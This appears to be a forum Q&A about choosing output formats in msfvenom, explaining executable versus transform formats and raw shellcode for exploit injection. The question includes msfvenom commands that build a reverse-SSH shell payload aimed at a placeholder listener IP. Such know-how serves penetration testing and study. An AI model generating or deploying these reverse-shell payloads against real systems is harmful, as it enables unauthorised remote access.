How can you tell the available output formats for a given payload in msfvenom? For example:
this wont work:
msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f elf > out.elf
but this will:
msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f raw > out.sh
and --list formats just shows every format in msfvenom
Best answer: it depends ;)
You know the difference between executable formats and transform formats? (Question about difference) You can list the formats with the
--list formats option. There you can see wether it is an executable format or for transformation.
Executable formats have the same file type / ending as the format name (
-f asp > file.asp). Exceptions are the ones with a hyphen: psh-* is a powershell format so you can use *.ps1 (wikipedia powershell filetypes). (and maybe the osx-app format can be a .bin).
Transform formats are more used to build a wrapper for the shellcode in the selected language. So if you use a generic windows/shell/bind_tcp with python (as in an official example) then the file will contain a whole python script and in there is a string variable called buf which contains the shellcode in python string syntax. Below this can be the execution / call of the string. The hex and even more the raw format is used to transform or encode it later or to directly inject it to an exploit. If you maybe find a buffer overflow (for example) which leeds to an execution of user defined content, then you won't need the headers of the executable formats (exe, elf, ...) but you need the 'raw shellcode'. Then use the raw type.
And note the payload itself: if you use
cmd/unix... then an
exe format won't work and an elf not all the time. If it begins with python/.. then use a raw format to inject in existing python 'exec' areas because the exploit is already in python format.
Try to use it without encoder (
-e generic/none) and inspect your output for different payloads (
cmd/unix/.. , ...) and different formats before you 'use' them.
External links referenced by this document: